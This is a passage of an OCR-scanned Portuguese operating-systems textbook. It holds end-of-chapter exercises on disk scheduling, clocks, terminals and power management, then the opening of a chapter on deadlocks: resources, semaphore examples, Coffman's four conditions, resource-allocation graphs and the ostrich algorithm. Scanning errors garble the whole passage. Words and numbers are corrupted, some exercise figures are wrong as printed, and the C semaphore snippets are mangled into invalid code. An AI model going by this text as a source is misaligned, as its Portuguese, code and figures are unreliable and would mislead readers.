e de 7,200 rpm, CaIculc (a) a eapacidadc do disco> (b) a 
toręao cilmdrica dtima c (c) a taxa maxima dc transferem 
eta de dados. 

22 . Um fabrkantc dc disco tem dois discos dc 5,25 polegadas, 
cada um com 10 mil dlindros. O mais novo tern o dobro 
da densidade linear de gravaęao do mais amigo. Quais 
propnedades do disco sao melhores no disco mais novo e 
quais sao as mesmas em ambos? 

23 . Um fabricante de computador decide reprojetar a tabela 
dc partięao de um disco rfgido do Pentium para forneccr 
mais do que quatro parlięoes. Cite algumas conseąuen- 
cias dessa troca, 

24 . As requisięoes do disco chegam ao drivcr do disco na sc- 
guintc ordcm dos dlindros: 10, 22, 20, 2, 40, 6 c 38. Um 
posiciona niemo leva 6 ms por cilindro movido. Q u anto 
tempo e necessario para 

(a) FCFS? 

(b) SSF? 

(e) Algoritmo do elevador {Lnicialmente movendo-se 
para cima)? 

Em todos os casos, o braęoesta inidalmente no cilindro 20. 

25 . Unia pepucna modsficaęao no algoritmo do elevador 
para organizaęao das solicitaęoes de disco consiste em 
sempre varrer as requisięocs cm uma linka dircęao. Em 
que sen lid o esse algoritmo ni od i fi ca do pode ser meihor 
do que o original? 

26 . Na discussao de arniazenainento estavel usando RAM 
nao volatil, o seguime ponto foi omitido: o quc ocorre 
quando a escrita esiavel se completa mas uma falha ocor¬ 
re antes dc o sistema opcracional cscrcver um numero 
de bloco valido na RAM nao yolaiil? Essa condięao de 
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disputa antąuila a abstraęao de armazena niemo estavel? 
Explique sua resposia. 

27* Na discussao dc armazcnamento estavei, mostramos que 
o disco pode ser recupcrado c voltar a um estado eon- 
sistente (uma operaęag ć conduida o u na o acontcce) se 
ocorrer uma parada da CPU duranie a escrita, Esta pro- 
priedade ć verdadeira caso a CPU parć novamcnte duran- 
le a rotina de recuperaęao? Explkjue. 

28. Em certo compuiador, o iraiador da imemipęao do reló- 
gio requcr 2 ms (induindo a troca de processos) para cada 
tique do relógio. O relógio irabalha a 60 Hz. Qua) fraęao 
da CPU e dcdicada ao relógio? 

29. Um compuiador uli li za um relógio programavcl no modo 
onda quadrada. Se lor Litilizado um crisial de 500 Młiz, 
qual deve ser o vator do regisiradorde apoio para alcanęar 
urna lesoluęao de 

(a) um milissegundo (um tiquedo relógio a cada milisse- 
gundo}? 

(b) 100 microsscgundos? 

30. Um sisterna simula multiplos rdógios cncadeando todas 
as solidtaęoes pendentes do relógio, eon formę mostrado 
na Figura 5.31. Suponha quc o tempo correntc q 5,000 
e que cxistam solidtaęoes pendenłes em 5.008, 5.012, 
5.015, 5.029 e 5.037. Mostre os valores do cabeęalho do 
relógio, o tempo real e o próxhno sinal em 5,000, 5.005 e 
5.013. Suponha que um novo sinal cliegue (e lique pen- 
dente) em 5.017 para 5,033, Mostre os yalores do cabeęa- 
Iho do rdógio, o tempo real e o próximo sinal em 5.023, 

31. Muitas vcrsócs do UNIX u sam um inteiro de 32 bits sem 
sinal para manter o controle da hora como o numero de 
segundos dcsdc a origem do tempo. Quando esses siste- 
mas vao zerar novamenie o horario (ano e mes)? Pode- 
jtsos esperar que isso realmente ocorra? 

32. Um terminal baseado em mapa de biis contem 1.280 por 
960 pbcels. Para rolar a Janda, a CPU (on o controlador) 
deve mover todas as linhas de texto para dnia copiando 
sens bits dc uma parte da RAM dc video para o utrą. Sc 
uma Janda especfica tein 60 linhas dc almra por 80 ca- 
racteres de largura (5,280 caracteres no total) e uma caixa 
de caracteres tern 8 pixels de largura por tó pixels de altu- 
ra, quanto tempo ele leva para rolar a janela toda usando 
lima taxa dc cópia de 50 ns por byte? Se todas as linhas 
sao de 80 caracteres de comprimento, qua! e a taxa em 
bauds equivalenie do terminal? A inseręlo de um carac- 
tere na tela leva 5 ps, Quantas linhas por segundo podein 
ser inostradas? 

33. Após a recepęao de um cara cle re DEL (S1GINT), o driver 
de vfdeo descana todas as safdas en ti lei rad as para a q cele 
video. Porque? 

34. No monitor colorido do PC IBM original a escrila na 
RAM cle video, em qualquer momento que nao fosse dti¬ 
ra nte o rctraęo verticai do feixe de raios do CRX deixava 
algumas manchas horriveis sobrca tda. Ha uma imagem 
de 25 por 80 caracteres, ondc cada um se enquadra cm 
uma caixa de 8 pixds por 8 pixels. Cada linha de 640 pi- 
xels e desenhada em uma unica yarredura horizontal do 


feixe, a qual leva 63,ó ps, induindo o retraęo horizontal. 
A tela e redesenhada 60 vezes por segundo; cada uma re- 
quer um period o de reiraęo yertical para obter o feixe de 
volta a o topo. Qual fraęao do tempo a RAM dc vfdeo esta 
disponfvd para escrita? 

35 . Os projetistas de um sisterna de compuiador esperavani 
que o mouse pudesse ser movido a uma taxa maxinia de 
20 cm7s. Se um rnickey ć 0,1 mm e cada mensa gem. do mou¬ 
se tern 3 bytes, qual e a taxa de dados maxima do mouse, 
supondo que cada mickcy seja rdatado separadamente? 

36 . As cores aditivas primarlas sao vermelbo, verde e azul, 
nu seja, qualquer cor pode ser comtrulda a partir de uma 
superposięao linear dessas cores. Ś possivd que alguem 
len ha uma fotografia colorida quc nao pode ser represen- 
tada usando um padrao de cores de 24 bits? 

37 . Unia nianeira de colocar um caractene cm unia tda com 
base em mapa de bits e usar bitblt de uma tabel a-fonie. 
Suponha que uma fonie espedlica use caracteres de 16 x 
24 ]>ixels em uma cor RGB verdadeira. 

(a) Quamo espaęo da tabda-lonte cada caractereocupa? 

Ib) Se a cópia de 1 byte leva 1 00 ns, induindo a sobrecarga, 
qual c a taxa de salda para o monitorem caracteres/s? 

38 . Supondo que a cópia de 1 byte demore 10 ns, quanto 
tempo levara para reescrever com pl eta me me a te ta de um 
monitor de vldeo mapeada na memória em modo texto 
de 80 caracteres x 25 linhas? E em rdaęao a uma tela gra¬ 
tka de 1.024 x 768 pixds com cores de 24 bits? 

39 . Na Figura 5,35 exislc inna elasse para RegisterCiass. No có- 
digo quc usa o sisterna X correspondenic, na Figura 5.33, 
nao cxistc cssa chamada ou algo parectdo com cla. Por quc? 

40 . No texto, damos um exemplo de como deseń bar um 
retangulo na tela dc vldeo usando a seguime GDI do 
Windows: 

Rectangle(hdc, xleft, ytop, xrrght, ybottom); 

Exisie alguma necessidade real para o primeiro para metro 
{lnic)? Em caso afirmativo, qual? Afinal, as coordenadas 
do retangulo sio exp lici la men te especificadas como pa- 
rametros. 

41 . Um terminal TU ING c usado para mostrar uma pagina 
da Web contendo um desenho animado de tamanho 400 
pixels x 160 pixcls executado em uma frequencia de 10 
quadros/s. Qual e a fraęao dc uma interface Fast Ethernet 
de 100 Mbps consumida pela exibięao do desenho? 

42 . Observou-se que o sisterna THINC fundona hem com 
uma rede de I Mbps em um tesle. Existem problenias 
provaveis em uma simaęao rmiltiusuario? Dka: considerc 
um grandę nu mero dc usuarios assistlndo a um show dc 
TV F e o mesmo nu mero dc usuarios navegando pela Web, 

43 . Sc a voltagcm maxima de uma CPU, V t ć red uzi da para 
Ww, sen consumo dc energia sc reduzira para lin 1 de seu 
yaior original e sua vcloddadc de relógio se reduzira para 
lin de seu valor original. Suponha que um usuario tecle 
em uma freąuencia de 1 caractere/s, mas o tempo de CPU 
riecessario para processar cada ca racie re seja de 100 ms. 
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QLial e o vaior ótimo de ;; e qual e a economia de ener¬ 
gia correspondeme se pereemualmente comparada com 
a voliagem nor mai sem corte? Suponha que urna CPU 
ociosa nao consuma qualquer lipo de energia. 

44. Um Lipiop e ajustado para tirar a rmkima vantagem das 
caracterfsticas de economia de energia, incluindo o desliga- 
mcnto do monitor e do disco nos period os de inaiividade. 
A Ig u mas vezes, determinado usnario execuia programas 
UNIX cm modo iexto e cm o u tras vc7.es usa o sistcma X- 
Window. EEe fica surpreso a o perceber que o tempo de vida 
da bateria esia significaiivanieme mellior do que ąnando 
cle usava programas com base em icxio. Por que? 

45. Escrcva um programa que simtile um armazenaniento 
estavel. Use dois arquivos grandes de tamanhos lixos em 
sen disco para simular os dois discos. 


46. Escreva um pro gra ma que implemcntc os ires aigoriimos 
dc escalonamemodcbraęo dc disco, Escreva um driverdc 
program a que gcrc uma seąuencia alealória dc numcros 
de dllndros (0-999), exccute OS ires aigoriimos para essa 
sequ6nria e exlba a distancia loial (numero de dlindros) 
de quc o braęo precisa para atravessar os tres algoritmos, 

47. Escrcva um programa para implcmeniar multiplos icm- 
porizadores ulilizando um unieo relógio. A cni rada para 
estc programa consiste de uma seąuencia de quatro tipos 
de comandos (S <int>, X E <int>, ?): S <im> define o 
tempo real para I e um tique do relógio e E <int> 
escalona um sinal para ocorrer no tempo <int>; P exibe 
os valores do tempo real do próximo sinal e do cabeęalho 
do relógio. Seu programa tambem deve exibir uma men- 
sagern sempre que for o momento de gerar um sinal. 
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Capitulo 



Impasses 


Os sistemas de coraputadores tern inumeros recursos 
ad eq u ad os a o uso de somente um proce sso a cada vez. En* 
trc os cxcmplos comuns cstao imprcssoras, imidades dc fila 
e en [rada s nas tabelas internas do sistema. Se dois processos 
ąuiserem escrever siniuliancamenle na mesrna impressora, 
isso gerara unia bagtmęa. A len lali va dc dois processos usa- 
rem a mes ma en trąd a da tabela do sistema de arquivos ine- 
vitavelmente conduzira a um sistema de arquivos corrom- 
pido. Como conseąuen da r lodos os sistemas operadonais 
devem ser capazcs de garanlir (temperariamcutc) o acesso 
exclusivo de um processo a eerios recursos. 

Para miiitas aplicaędes, um processo ncccssita de aces¬ 
so cxclusivo nao só a um recurso, mas tambem a varios. 
Suponfoa, por exemplQ, que dois processos ąueiram cada 
um gravar cm CD um documętno escaneado. O processo 
A solicila pennissao para usar o scanner e c autorizado. O 
processo B t que e programado diferememente, solicita pri- 
meiro pennissao para usar o gravador de CD e tambem e 
autorizado. Entao, o processo A pede para usar o gravador 
de CD, mas a soli ci la ęa o Ihc c negacia ale quc o processo B 
o libere. infelizmente, em vez de liberar o gravador de CD, o 
processo ,6 pede para usar o scanner. Nesse ponto, ambos 
os processos ficam bloqueados e assim permanecerao para 
sempre. Essa situaęao e denoniinada impasse {deadtock). 

rmpasses tambem podcm ocorrcr cnirc maąuinas. Por 
exemplo, inuitos escrilórios tem redes locais com varios 
compuladores conectados a elas. Muiias vezes dispositivos 
como scanners, gravadores de CD, imprcssoras e imidades 
dc fila sao conectados a cssas redes como recursos compar- 
tilhados, dispoinveis a qualquer usuario em qualquer ma- 
quina. Se esses disposilivos puderem ser reservados remo- 
tamente (isto e, da maquma de um usuario), o mesmo lipo 
de impasse podera ocorrcr como descrito anteriormente. 
Situaęoes mais complicadas poderao causar impasses que 
envolvam tres r quatro on mais dispositivos e usuarios. 

Impasses podem ocorrcr em divcrsas ouiras situaęoes 
alem daątielas que envolvem reąuisięoes simultaneasa dis- 
positivos de E/S dedicados. Em um sistema de banco de 
dados, por exemplo, um programa pode ter de bloquear 
o acesso a diversos registros quc estiver usando, a firn de 
evitar condięoes de corrida (race conditions). Se o processo 
A bloąuear o acesso ao registro Ri o processo B bloąuear 
o acesso ao regisiro R2 e depois cada processo lentar blo¬ 
ąuear o acesso ao registro do outro, tambem teremos um 
impasse. Assim, impasses podcm ocorrcr tanto cm recursos 
dc hardware quamo dc software. 


Nesie capftulo, analisaremos os impasses em mais de- 
talhes, vcndo como surgem c algumas manriras dc prcvc- 
nidos ou eviia-los. Embora o enfoąue seja sobre impasses 
no comexio de sistemas operadonais, cles tambem podem 
ocorrer em sistemas de banco de dados e em diversos ou- 
iros contextos em ciencia da compulaęao, de modo quc 
esse materiał pode ser aplicado a unia ampla gania de siste¬ 
mas multiprooessos* Muito tern sido escriio sobre impasses, 
Dois artigos sobre esse assunto apareceram na Operating 
Systems Review e merecem ser consuliados: Newton (1979) 
e Zobd (1983). Apesar de essas referencias serem antigas, 
a maior parte dos trabalhos sobre impasses data de muito 
antes dc 1980, de modo que esses artigos ainda sao litcis. 


6.1 


Uma classe importante dc impasses envoive recursos e, 
dessa forma, comeęaremos estudando o que eles sao. im¬ 
passes podem ocorrer quando varios processos recebem di- 
reitos de acesso exciusivo a dispositivos P arqtiivos etc. Para 
tornar a discussao sobre impasses o mais geral posswel fa- 
remos refcrencia aos objetos accssados como recursos. Um 
recurso pode ser um disposiiivo de hardware (por exenv 
plo, urna tinidadc dc fila) ou um ireclio dc informaęao (por 
exemplo ( um regisiro iravado em u ma base de dados). Um 
computador em geral tem unia variedade de diferentes re¬ 
cursos que podem ser adąuiridos. Para algtins recursos, va- 
rias instandas idcnticas podcm estar disponweis, como tres 
imidades de Nta. Quando varias cópias dc urn recurso se 
encontram disponfveis, qualquer uma delas pode ser usa- 
da para salisfazer qualquer requisięao daąuele recurso. Em 
resume, um recurso e algo que pode ser adquirido, u sad o e 
iiberado com o passar do tempo. 

6.1.11 Recursos preemptiveis e nao 
preemptiveis 

Ha doistipos de recursos: preemptfveise nao preemptf- 
veis + Um recurso preemptfvel ć aqude que pode ser re- 
Llrado do processo proprietario sem nenhum prejuizo. A 
memória e um exetnplo de recurso preemptwei. Conside- 
re, por exemplo, um sistema com 256 MB de memória dis- 
ponfvel para usuarios, urna impressora e dois processos de 
256 MB que qudram imprimir algo. O processo A requiska 
e obtem a impressora e, emao, passa a computar os valo- 
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res para a impressao. Antes que fmalłze sua computaęao, 
sua fatia de tempo de CPU e excedida e ele e retirado da 
memória. 

O processo B esta agora cm exccuęao e Lenia, sem su- 
cesso, obter para si a ma da impressora. Potencialmente, 
estamos dianie dc urna situaęao de impasse, pois o pro¬ 
cesso A tern a impressora c o processo 8 leni a memória e 
nenhum deles pode prossegutr sem o recurso mant ido pelo 
outro. Fdizmcnte, e possivel tomar a memória do proces¬ 
so B enviando-o para disco e carrcgantio o processo A na 
memória. Agora o processo A pode execuiar r tenninar sua 
impressao c, entao, liberara impressora. Nenhum impasse 
ocorre* 

Urn recurso nao preemptivel, ao contrario, e aqueie 
que na o pode ser retirado do atual processo proprieiario 
sem que a compulaęao apresente fal ha. Se um processo co- 
meęou a gravar um CD-ROM, retirar dde rep en lina menie 
o gravador de CD e dar a um outro processo resukara em 
um CD coni erros. Gravadores de CD sao recursos que nao 
podem ser tomados a qudquer momento, isto e, nao sao 
preemptweis. 

Em geral, impasses envolvem recursos nao preemptf- 
veis. Situaęoes que potencialmente causam impasses en- 
volvendo recursos preeinptfccis cm geral podem ser resol- 
vidas realocando recursos de um processo a outro. Desse 
modo, nosso e stu do en fo cara os recursos nao preemptfveis. 

A seąuenda de eventos necessarios ao uso de um de- 
terminado recurso e dada abaixo de maneira abstrata: 

L Requisitar o recurso. 

2. Usar o recurso. 

3. Ltberar o recurso. 

Se o recurso nao estiver disponfvel quando reąuisila¬ 
do, o processo solicitante sera foręado a esperar. Em algnns 
sistemas operacionais, o processo sera automaticamenie 
bloąueado quando urna reąuisięao de recurso falhar, mas 
sera acordado quando o recurso lornar-se disponwel. Em 
outros sistemas, a falha da reąuisięao resultara em um có- 
digo de erro; cabe ao processo solicitante esperar um pouco 
c tentar novamente. 

Um processo cuja reąinsięao de recurso tenha sido 
negada normaInieme permanecera em um peąueno laęo 
que reąuisitara continua me nie o recurso, depois dormi- 
ra e lentara novamenie. Embora esse processo nao esteja 
bloąueado, para lodos os efdlos e propósilos sera como se 
estiyesse, pois nao pociera realizar qualquer trabalbo Ci tli. 
Mais adiante em nosso estudo, vamos supor que, quando 
um processo tiver u ma solicitaęao de recurso negada, ele 
sera colo ca do para dormin 

A forma cxata de solicitaęao dc recurso ć totalmente 
dependente do sistema. Em algnns sistemas, existe unia 
chamada dc sistenia do lipo reąuest a qual pcrmilc quc 
processos solicitem recursos cxpli dla menie, Em outros, os 


u ni cos recursos que o sistema operacional conhece sao ar- 
quivos especiais que somente um processo por vez pode 
abrir. Esses arquivos sao abertos por uma chamada comum 
do tipo open. Se o arquivo ja estiver em uso, o processo 
chamador sera bloąueado a te ser fechado pclo proprieiario 
atual. 

6.1.2 I Aquisicao de recursos 

Para algnns tipos de recursos — como registros em um 
sistema de banco dc dados —, cabe aos processos dc usua- 
rio gerendar, des mesmos, o uso dós recursos. Uma ma- 
neira de permitir ao usuario o gerenciamento de recursos e 
associar um semaforo a cada recurso. Esses semaforos sao 
todos imcializados com l, Variaveis do tipo muiex tambem 
podem ser usadas, Os tres passos relacionados amerior- 
memc sao entao implemenlados como uma operaęao down 
no semaforo para aąuisięao e milizaęao do recurso e, por 
lim, uma operaęao up no semaforo para liberaęao do recur¬ 
so. Esses passos sao ni ostra d os na Figura 6.1 (aj. 

A Ig u mas vezes, os processos predsam de dois o u mais 
recursos. Eles podem ser adquiridos scąuencialmcme, 
como mostrado na Figura 6.1 (b), Se mais de dois recursos 
sc fizerem necessarios, eles serao simplcsmeme adąuindos 
um após o outro, 

Ate aqui, tudo bem. Enąuanto apenas um processo es- 
tiver envolvido, as coisas funcionarao bem. fi claro que, 
te ad o somente um processo, nao ha necessidade de adqui- 
rir recursos form a 1 menie, pois nao ha compeiięao por eles. 

Agora ima ginem os uma situaęao com dois processos, A 
e B t e dois recursos. Dois cenarios sao apresentados na Fi¬ 
gura 6.2. Na Figura 6,2(a), ambos os processos solicitam os 
recursos na mesma ordeni. Na Figura 6,2(b>, eles solicitam 
os recursos em uma ordem di Terenie. Essa diferenęa pode 
parecer irrelevante, mas nao e. 

Na Figura 6.2(a), um dos processos vai adąuirir o pri- 
mciro recurso antes do outro, Essc processo tambem sera 
bem-sucedido na aąnisięao do segundo recurso c pociera 
executar seu trabalbo. Se o outro processo tentar adąuirir o 
recurso l antes de esie ter sido liberado, esse processo sera 


typedef int semaphore; 
semaphore resource_1; 


void process_A(void) { 
down(&resource„J); 
use_resource_1(); 
up(&resource_1); 

> 


(a) 


typedef int somaphore; 
semaphore resource_1; 
semaphore resource„2; 

void process_A{void) { 
downf&resou rce „ 1); 
do w n (8i resou rce _2); 
use_both_resources(); 
up(&resource_2); 
up(&resource_1); 

} 

(b) 


I Figura 6.1 O uso de um semaforo para proteger recursos. 
(aj Um recurso. (b) Dois recursos. 
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typedei int semaphore; 

semaphore resource„1; semaphore resource^t; 

semaphore resource_2; semaphore resource_2; 


void process A(void){ 
down(&resouree_1}; 
do w n (&re sou rce _ 2); 
use _bołh_ resourcesf); 
up(&resource_2); 
upf&resource .1); 

} 


void process A(void) { 
down(&resource_.1); 
down(&resource_2); 
use _ bot h_ resourcesf); 
up(&resource_2); 
up(&resource_1); 


vo]d process_ B(void) { 
downf&resource.l); 
do w n (&re sou rce _2); 
use bołh resourcesf); 
up(&re$ource_2); 
up(&resource_1); 


void process.B(void) { 
down(&resource_2); 
do w n (& reso u rce _ 1); 
use both resourcesf); 
upf&resource.l); 
up (&res ou rce _ 2); 


(a) 


1 Figura 6,2 (a) Código sem impasse, (b) Código com possibilidade de impasse. 


(b) 


simplcsmentc bloąucado ale o rccurso cm ąucstao estar 
dispomvel. 

Na Figura ó.2(b}, a situaęao ć difercnte* Nesse caso, 
pode ocorrer que um dos processos adąuira os dois recursos 
c efctivamenie bloąucie o outro processo ate scu trabalho 
estar pronto. No entanto, a i uda e possrvel que o process o .4 
adquira o rccurso i e o processo B adąuira o rccurso 2, En- 
tao, cada um deles ficara bloąucado ąuando Lentar adąuirir 
o outro rccurso* Nenhum dos processos podera continuara 
ejcecuęao. Estamos tiiante de um impasse. 

Nesse exemplo f verificamos como o que parece ser 
apenas urna peąuena diferenęa de estilo dc programaęao — 
qual rccurso sera adąutrido primeiro — determina sc o 
próg rama vai funcionar ou na o, u ma smileza diftcil de ser 
detectada. Como impasses podem ocorrer fadlrnente, mul¬ 
ta pcsąuisa icm sido feita accrca de como lidar com des. 
Esic capftulo discutc impasses cm detalhes c o que pode ser 
feito a esse respeito. 


6.2 


Introduęao aos impasses 


Um impasse pode ser formabnente definido da seguin- 
te forma: 

Um conjunto de processos es tam cm situaęm de impasse se 
todo pmesso pertaicente ao conjunto estmr esperando por um 
evento que sommte outro processo desse mesmo conjunto podera 
fazer acontecer. 

Como todos os processos osra o esperando, nenhum 
deles desencadeara qualquer um dos eventos que pode- 
riam acordar algum(ns) outro(s) membro(s) do conjunto 
e, assim, todos os processos continuam a esperar para setu¬ 


pie, Para esse modeło, considcrarnos que os processos tern 
somenie um unico thread e que nao cxistem miermpębes 
poss(vcis para acordar o processo bloąucado. A eon di ęa o 
de nao havcr mierrupęoes e necessaria para cvitar quc um 
processo cm situaęao de impasse seja acordado por diga- 
mos H um a lar me o, entao, ca use evento(s) que libere(m) 
outros processos do conjunto. 

Na maioria dos casos, o evento que ca da processo esta 
esperando e a liberała o de algum recurso sob a posse atual 
de um outro membro do conjunto. Em outras pa la v ras, cada 
membro do conjunto dc processos em situaęao de impasse 
eticontra-se a espera de urn recurso que esta sen do osado 
por um outro processo tambem em situaęao de impasse, Ne¬ 
nhum dos processos pode continuar a execuęao, nenhum 
deles pode liberar qualquer recurso e nenlium deles pode ser 
acordado, O numero de processos, bem como o nu mero e o 
lipo dos rccursos possufdos c reąuisUados, nao e importante, 
Esse resultado e valido para qualquer lipo de recurso, tamo 
para hardware como para software. Esse tipo dc impasse e 
denominado impasse de recurso e e provavehnentc o tipo 
mais comum, embora nao seja o unico. Primeiro estudare- 
mos esse tipo de impasse e T no finał desie capftulo, aborda- 
remos brevemente os outros tipos. 

_ 6.2.11 Condicoes para ocorrencia de 

impasses de recursos 

Coffman et al. (1971) m ostra ram que ha quatro condi- 
ęoes para que ocorra um impasse (de recurso): 

I. Condięao de exdusao mutua. Em um determinado 
instante, cada recurso esta em urna de duassituaęoes: 
o u associado a um unico processo ou disponiveJ. 
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2. Condięao de posse e espera. Processos que, em mn 
determinado instante, retem recursos concedidos 
anteriormente podern reąuisitar novos recursos. 

3. Condięao de nao preempęao. Recursos concedidos 
previamente a um processo nao podem ser ioręo- 
samente tomados desse processo — eles devem ser 
explicitamente liberados pdo processo que os retem. 

4. C on di ęa o de espera drcu] a r. Deve e xisti r u ni encadea - 
mento drcu lar de dois ou mais processos; ca da um 
deies encomra-se a espera de um recurso que esta 
sendo usado pdo membro seguinte dessa cadcia. 

Todas essas quairo condięoes devem esiar presentes 
para que um impasse ocorra. Se faiiar urna delas, o impasse 
de recurso nao ocorrera. 

Ć imponante notar que cada condięao esta rdacionada 
a uma poKtica que o sistema pode ou nao adotar, Um certo 
recurso pode ser associado a mais de um processo por vez? 
Um processo pode ier um recurso e reąuisitar outro? Os 
recursos padem sofrer preempęao? Ć possfvel que exista 
espera circuiar? Poster i orni ente, veremos como impasses 
podem ser atacados lentando-se negara eles alguma dessas 
condięoes. 

6.2.21 Modelagem de impasses 

Holt {1972) mostron como essas quatro condięoes po¬ 
dem ser modeladas a partir do uso de grafos dirigidos. Esses 
grafos possuem dois tipos de nos: processos — simbolizados 
como circulos — c recursos — mostrados como quadrados. 
O a rco dc um recurso (no qu ad rado) para um processo (nó 
cm drculo) indica que o recurso foi prcviamente reąuisita- 
do, alocado e que atualmente esta sendo usado pdo referi- 
do processo. Na Figura ó.3(a), o recurso atualmente esta 
alocado ao processo A. 

Um arco dirccionado dc um processo para um recurso 
indica quc o processo esta corrcntcmcnlc bk>qucado espe- 
rando pdo referido recurso* Na Figura 6*3(b), o processo B 
esta esperando pdo recurso S. Na Figura 6,3{c), vemos um 
impasse; o processo Cesia esperando pdo recurso T, que 
esta atualmcme sendo usado pdo processo D< O processo D 



(a) (b) (c) 


Figura 6*3 Grafos de aiocaęao de recursos. (a) Processo de 
posse de um recurso. (b) Processo requisitando um recurso, 
(c) Impasse. 


nao se encontra prestes a liberar o recurso T, pois de espera 
pelo recurso U , usado por C. Ambos os processos vao espe- 
rar para sempre, Um dclo no grało indica que existe um 
impasse quc envolve os processos c recursos (presumindo 
quc cxistc um recurso de cada Lipo). Nesse exempio, o dclo 
e C-T-D-U-C 

Agora obsci vemos um exemplo de como grafos de re¬ 
cursos podem ser usados, Imagine tres processos, A, B e C 
c trćs recursos, R f Sc T, As rcąuisięocs c libcraęocs dos tres 
processos sao dadas nas figuras 6.4(a)^(c). O sistema ope¬ 
ra cional esta livre para colocar em execuęao, em qualquer 
instante, qualquer processo quc nao esteja bloąueado, de 
modo que ele poderia decidir colocar A em execuęao ale 
que A finalizasse todo o sen trabalho, colocando B em exe- 
cuęao, em seguida, ate sua conclusao e, por firn, poda Cem 
execuęao. 

Essa ordom dc cxccuęao nao gera qualqucr impasse 
(pois nao existe competięao por recursos), mas tambem 
nao ha qualquer paraldismo. Alem de rcąuisięocs e iibe- 
raęoes de recursos, os processos ex ecu tam e fazem E/S. 
Quando os processos estao executando seąuendalmente, 
nao ha nenii unia possibilidade de um processo usar a CPU 
enąuanto outro esta esperando por E/S, Assim, a execu- 
ęao estriiamenie seąuencial de processos pode nao ser a 
melhor opęao. Por outro lado, se nenhum dos processos fi- 
zer qualquer lipo de E/S, o algoritmo job mais curto primeiro 
(shomst job first) sera melhor do que o algoritmo ahernmda 
circuiar (round-robin); partanio, sob ernas eircunstancias, a 
execuęao sequcndal dc lodos os processos pode ser o mc- 
Ihnr ca mi nho. 

Vamos supor que os processos faęam tamo E/S quan- 
to proce ss a mento, de modo que o algoritmo alternanda 
circuiar seja um algoritmo razoavd dc cscalonamento. As 
rcąuisięoes dc recursos podem ocorrer na ordeni da Figu¬ 
ra 6.4(d). Se cssas seis reąihsjęocs sao realizadas nessa or- 
detn, os seis grafos de recursos resuhantes sao mostrados 
nas figuras ć.4(e)-(j). Após a reąuisięao 4 ter sido feita, A 
bloąueia a espera de 5, como mostrado na Figura 6.4(11)* 
Nos próximos dois passos, B e C tambem sao bloqueados, 
ievando, por firn, a um dclo que representa urna situaęao 
de impasse ilustrada na Figura 6,4 (j). 

Contudo, conformeja mencionamoS; o sistema opera- 
cional nao 6 obrigado a colocar os processos em execuęao 
em nenhuma ordeni especial. Em pariicular, se o atendi- 
menio de uma reąuisięao for capaz dc gerar um impasse, 
o sistema operadonal pociera simplesmente suspender o 
processo sem atender a rcquisięao (isto e, nao escalonando 
o processo) ale que possa ser atendida com seguranęa. Na 
Figura 6.4, se o sistema operadonal soubesse do impasse 
i nd nenie, ele poderia suspender B em vcz dc autoriza-lo 
a usar S. Executando somente A e C obtenamos as requi- 
sięoes e as liberaęoes da Figura ó.4(k), e nao as da Figura 
6*4(d). Essa sequenria leva aos grafos de recursos das figu¬ 
ras 6.4{l)“(q), os quais nao causam impasse. 
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Após o passo (q), S pode ser concedido ao processo B f 
pois A ja tera finalizado o uso dcssc recurso c C tern tu do 
aquilo de que de precisa, Ainda que B venha a ser blo- 
ąneado quando solicitar T, nenhum impassc pode ocorrcr. 
B simplesmcnie vai esperar a te quc Ctermine. 

Mais a dianie, ainda neste capilulo, estudaremos um 
algoritmo detalhado usado para tomar decisóes de alocaęao 
que nao causam impasses. Por enquanio, basta saberąue os 
grafos de rectirsos sao uma ferramema que nos permite ver 


quando urna dada sequencia de reąuisięao/liberałao pode 
lcvar a impasse. Simplesmcnie atcndcmos cis rcquisięocs 
e liberaęoes passo a passo e, após cada passo, observamos 
o grafo para verificar se de contem algum ciclo. Em caso 
afirmativo, tcremos um impasse; do contrario, nao cxistira 
impassc. Embora nosso tratamemo de grafos de rectirsos 
se refira ao caso da exisiencia de um u ni co recurso de cada 
tipo, gra fos de recursos ta mb cm pudem, ser generalizados 
para tratar varios recursos de mesmo lipo (Holi, 1972). 


A 


B 


C 


Requisita R 
Requisita S 
Libera R 
Libera S 


Requi$ita S 
Requisita T 
Libera S 
Libera T 


Requisita T 
Requisita R 
Libera T 
Libera R 


(a) 


(b) 


(c) 


1. A requisila 

2. B requisita 

3. C requisita 

4. A reqiri$ita 

5. B requisrta 

6. C requisita 
impasse 


R 



© © 

0 0 




<d) W 


(f) 


tfl) 
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I Figura 6.4 Exempio de como um impasse ocorre e como pode ser evitado. 
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Em geral, quatro estrategias sao usadas para lidar com 
impasses: 

1. Ignorar por completo o problema. Se voce o ignorar, 
talvcz elc ignorc voce. 

2. Detecęao c recuperaęao. Deixar os impasses ocorrc- 
rcm, detecta-los e agir, 

3. Anul aęao dmamica por mciu de urna alocaęao cui- 
dadosa de recursos, 

4. Prevenęao, negando estruturaimente uma das qua- 
tro condięoes necessarias para gerar um impasse. 

Examinarcmos cada u ni dcsses mćt odos nas próximas 
qualro seęoes. 



Algoritmo do ayestruz 


O metodo mais simples ć o do algoritmo do ave$tmz: 
entcrre sua cabcęa na arcia e finja que nada esta aconte- 
ecndo. 1 Pessoas diferemes reagem a cssa estrategia de ma- 
neiras dilerem es. Maiematicos consideram-na lotalmente 
maceitavel e acreditam que impasses devem ser evitados 
a qualquer custo. Engenheiros perguntam com que fre- 
ąuencia o problema e csperado, com que freąuencia o sis- 
tema fal ba por outras razoes e ate que ponto um impasse 
pode ser serio. Se impasses aconteeerem, tui media, urna 
vez a cada cinco anos, mas ocorrerem falhas no sistema a 
cada semana, em virtude de problemas de hardware, erros 
dc compifaęao c dcfcitos no sistema opcradonal, a maioria 
dos engenheiros nao aceitara per der desempenho para eli - 
minar impasses. 

Para tornar esse contraste mais espedfko, imaginc um 
sistema operaciona! que bloqueia o processo cbamador 
quando uma solicitaęao open para um disposiiivo lisico, lal 
como um CD-ROM ou uma impressora, nao pode ser pro- 
cessada porque o periferico es ii ocupado, Em geral, cabe 
ao drlvcr do dispositivo decidir sobre o quc fazer nessas 
drcunstancias. Bloąuear ou ret orna r um código de erro sao 
duas possibilidades óbvias, Se um processo consegue abrir 
com sucesso a unidade de CD-ROM, outro processo con- 
segue acesso a impressora c os dois r.entam abrir o recurso 
um do outro e sao bloąucados, temos um impasse, Poueos 
sistemas atu ais conseguiriam dctecta-lo. 


|2| Detecęao e recuperaęao de 
impasses 

Uma segunda tętnica e a detecęao e recuperaęao. 
Quando ela e usada, o sistema nao tema prevenir a ocor- 
rencia dc impasses. Em vez disso, de deisara quc ocorram 
e terna ra detectados a merli da que isso a eon te cer, agindo. 


entao, de alguma maneira para se reenperar após o falo. 
